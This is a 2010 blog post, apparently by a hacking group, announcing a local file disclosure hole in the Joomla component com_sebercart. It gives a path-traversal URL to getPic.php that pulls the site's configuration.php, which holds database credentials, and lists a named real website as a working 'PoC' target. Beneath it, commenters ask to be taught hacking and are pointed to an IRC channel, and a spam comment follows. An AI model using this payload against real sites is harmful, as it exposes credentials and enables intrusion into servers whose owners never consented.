SeberCart LFD Vuln [ readfile() ]

SeberCart LFD Vuln [ readfile() ]

on May 13, 2010

[o] Joomla Component Seber Cart Local File Disclosure Vulnerability

Software : com_sebercart
Vendor : http://www.seber.com.au/
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[at]antisecurity[dot]org
Home : http://antisecurity.org/

[o] Exploit

http://localhost/[path]/components/com_sebercart/getPic.php?p=../../configuration.php

Download image.jpg file and open it with notepad or gedit.
You will see joomla configuration there.

[o] PoC

http://www.rare-earth.com.au/components/com_sebercart/getPic.php?p=../../configuration.php

Comments

kemud said…

g bisa kak.....hahaha...isa ajarin langsung g kak.Ymnya apa biar saya add..

May 14, 2010 at 9:42 AM

evilc0de said…

join ke public irc chan kita aza yah..

#evilc0de @ irc.byroe.net

May 19, 2010 at 12:43 AM

kemudshared said…

oke deh...tapi kalo isa ym kak . soale dari dulu aku belajar lewat web ini , and g tau (kenal) sama yang bikin.....

May 31, 2010 at 9:57 PM

kemud said…

bang ajari aku,,,,tak cari g nemu2 huhuhu....YMnya apa ntar biar aku add bang apa email gt.

June 20, 2010 at 6:15 PM

evilc0de said…

wew.. nyari apa yang ga nemu2 niy?
neh email gw.. noge.code@gmail.com

July 2, 2010 at 11:06 AM

abercrombie coupons said…

Thank you for sharing with us. The content is very good and helpful for me, I learn and know more about it.

August 5, 2011 at 4:09 PM